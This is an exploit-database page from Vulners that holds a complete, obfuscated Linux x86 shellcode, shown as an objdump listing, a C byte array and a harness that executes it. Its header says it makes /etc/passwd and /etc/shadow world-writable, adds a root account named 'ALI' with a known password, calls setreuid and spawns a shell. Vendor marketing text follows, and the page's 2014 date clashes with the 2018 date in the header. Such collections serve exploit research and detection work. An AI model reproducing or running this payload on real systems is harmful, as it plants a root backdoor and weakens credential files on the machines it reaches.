Vulners
Lucene search
Obfuscated Shellcode Linux x86 - chmod 777 /etc/passwd + /etc/shadow & Add New Root User & Execute /bin/bash
/*
#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
#length: 521 bytes
#Date: 8 September 2018
#Author: Ali Razmjoo
#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
Ali Razmjoo , [email protected]
Thanks to Jonathan Salwan
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
setreuid() , execve('/bin/sh')
root@user:~/Desktop/xpl# objdump -d f.o
f.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: bb 59 45 4f 53 mov $0x534f4559,%ebx
d: ba 33 36 38 37 mov $0x37383633,%edx
12: 31 d3 xor %edx,%ebx
14: 53 push %ebx
15: c1 eb 08 shr $0x8,%ebx
18: 53 push %ebx
19: bb 7a 46 59 45 mov $0x4559467a,%ebx
1e: ba 55 36 38 36 mov $0x36383655,%edx
23: 31 d3 xor %edx,%ebx
25: 53 push %ebx
26: bb 67 58 45 4e mov $0x4e455867,%ebx
2b: ba 48 3d 31 2d mov $0x2d313d48,%edx
30: 31 d3 xor %edx,%ebx
32: 53 push %ebx
33: 89 e3 mov %esp,%ebx
35: 68 41 41 ff 01 push $0x1ff4141
3a: 59 pop %ecx
3b: c1 e9 08 shr $0x8,%ecx
3e: c1 e9 08 shr $0x8,%ecx
41: 6a 0f push $0xf
43: 58 pop %eax
44: cd 80 int $0x80
46: bb 53 49 57 4a mov $0x4a574953,%ebx
4b: ba 39 2d 38 3d mov $0x3d382d39,%edx
50: 31 d3 xor %edx,%ebx
52: c1 eb 08 shr $0x8,%ebx
55: 53 push %ebx
56: bb 6d 47 45 58 mov $0x5845476d,%ebx
5b: ba 42 34 2d 39 mov $0x392d3442,%edx
60: 31 d3 xor %edx,%ebx
62: 53 push %ebx
63: bb 6e 54 49 57 mov $0x5749546e,%ebx
68: ba 41 31 3d 34 mov $0x343d3141,%edx
6d: 31 d3 xor %edx,%ebx
6f: 53 push %ebx
70: 89 e3 mov %esp,%ebx
72: 68 41 41 ff 01 push $0x1ff4141
77: 59 pop %ecx
78: c1 e9 08 shr $0x8,%ecx
7b: c1 e9 08 shr $0x8,%ecx
7e: 6a 0f push $0xf
80: 58 pop %eax
81: cd 80 int $0x80
83: bb 73 47 4e 51 mov $0x514e4773,%ebx
88: ba 32 34 39 35 mov $0x35393432,%edx
8d: 31 d3 xor %edx,%ebx
8f: c1 eb 08 shr $0x8,%ebx
92: 53 push %ebx
93: bb 59 44 56 44 mov $0x44564459,%ebx
98: ba 76 34 37 37 mov $0x37373476,%edx
9d: 31 d3 xor %edx,%ebx
9f: 53 push %ebx
a0: bb 4e 58 59 51 mov $0x5159584e,%ebx
a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx
aa: 31 d3 xor %edx,%ebx
ac: 53 push %ebx
ad: 89 e3 mov %esp,%ebx
af: 68 41 41 01 04 push $0x4014141
b4: 59 pop %ecx
b5: c1 e9 08 shr $0x8,%ecx
b8: c1 e9 08 shr $0x8,%ecx
bb: 6a 05 push $0x5
bd: 58 pop %eax
be: cd 80 int $0x80
c0: 89 c3 mov %eax,%ebx
c2: 6a 04 push $0x4
c4: 58 pop %eax
c5: 68 41 73 68 0a push $0xa687341
ca: 59 pop %ecx
cb: c1 e9 08 shr $0x8,%ecx
ce: 51 push %ecx
cf: b9 57 67 57 58 mov $0x58576757,%ecx
d4: ba 39 48 35 39 mov $0x39354839,%edx
d9: 31 d1 xor %edx,%ecx
db: 51 push %ecx
dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx
e1: ba 74 4b 38 38 mov $0x38384b74,%edx
e6: 31 d1 xor %edx,%ecx
e8: 51 push %ecx
e9: b9 47 57 56 42 mov $0x42565747,%ecx
ee: ba 35 38 39 36 mov $0x36393835,%edx
f3: 31 d1 xor %edx,%ecx
f5: 51 push %ecx
f6: b9 61 70 51 4e mov $0x4e517061,%ecx
fb: ba 2d 39 6b 61 mov $0x616b392d,%edx
100: 31 d1 xor %edx,%ecx
102: 51 push %ecx
103: b9 48 58 70 74 mov $0x74705848,%ecx
108: ba 72 68 4a 35 mov $0x354a6872,%edx
10d: 31 d1 xor %edx,%ecx
10f: 51 push %ecx
110: b9 76 45 56 46 mov $0x46564576,%ecx
115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx
11a: 31 d1 xor %edx,%ecx
11c: 51 push %ecx
11d: 68 66 77 55 57 push $0x57557766
122: 68 68 70 31 50 push $0x50317068
127: 68 7a 59 65 41 push $0x4165597a
12c: 68 41 61 41 51 push $0x51416141
131: 68 49 38 75 74 push $0x74753849
136: 68 50 4d 59 68 push $0x68594d50
13b: 68 54 42 74 7a push $0x7a744254
140: 68 51 2f 38 54 push $0x54382f51
145: 68 45 36 6d 67 push $0x676d3645
14a: 68 76 50 2e 73 push $0x732e5076
14f: 68 4e 58 52 37 push $0x3752584e
154: 68 39 4b 55 48 push $0x48554b39
159: 68 72 2f 59 42 push $0x42592f72
15e: 68 56 78 4b 47 push $0x474b7856
163: 68 39 55 66 5a push $0x5a665539
168: 68 46 56 6a 68 push $0x686a5646
16d: 68 46 63 38 79 push $0x79386346
172: 68 70 59 6a 71 push $0x716a5970
177: 68 77 69 53 68 push $0x68536977
17c: 68 6e 54 67 54 push $0x5467546e
181: 68 58 4d 69 37 push $0x37694d58
186: 68 2f 41 6e 24 push $0x246e412f
18b: 68 70 55 6e 4d push $0x4d6e5570
190: 68 24 36 24 6a push $0x6a243624
195: b9 73 61 74 67 mov $0x67746173,%ecx
19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx
19f: 31 d1 xor %edx,%ecx
1a1: 51 push %ecx
1a2: 89 e1 mov %esp,%ecx
1a4: ba 41 41 41 7f mov $0x7f414141,%edx
1a9: c1 ea 08 shr $0x8,%edx
1ac: c1 ea 08 shr $0x8,%edx
1af: c1 ea 08 shr $0x8,%edx
1b2: cd 80 int $0x80
1b4: 31 c0 xor %eax,%eax
1b6: b0 46 mov $0x46,%al
1b8: 31 db xor %ebx,%ebx
1ba: 31 c9 xor %ecx,%ecx
1bc: cd 80 int $0x80
1be: 31 c0 xor %eax,%eax
1c0: b0 46 mov $0x46,%al
1c2: 31 db xor %ebx,%ebx
1c4: 31 c9 xor %ecx,%ecx
1c6: cd 80 int $0x80
1c8: 68 52 55 48 42 push $0x42485552
1cd: 68 52 51 49 43 push $0x43495152
1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx
1d7: ba 66 38 31 35 mov $0x35313866,%edx
1dc: 31 d1 xor %edx,%ecx
1de: 51 push %ecx
1df: b9 55 55 54 57 mov $0x57545555,%ecx
1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx
1e9: 31 d1 xor %edx,%ecx
1eb: 51 push %ecx
1ec: 89 e3 mov %esp,%ebx
1ee: 31 c0 xor %eax,%eax
1f0: 88 43 07 mov %al,0x7(%ebx)
1f3: 89 5b 08 mov %ebx,0x8(%ebx)
1f6: 89 43 0c mov %eax,0xc(%ebx)
1f9: b0 0b mov $0xb,%al
1fb: 8d 4b 08 lea 0x8(%ebx),%ecx
1fe: 8d 53 0c lea 0xc(%ebx),%edx
201: cd 80 int $0x80
203: b0 01 mov $0x1,%al
205: b3 01 mov $0x1,%bl
207: cd 80 int $0x80
root@user:~/Desktop/xpl#
*/
#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n\n",strlen(sc));
(*(void(*)()) sc)();
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Sep 2014 00:00Current
0.1Low risk
Vulners AI Score0.1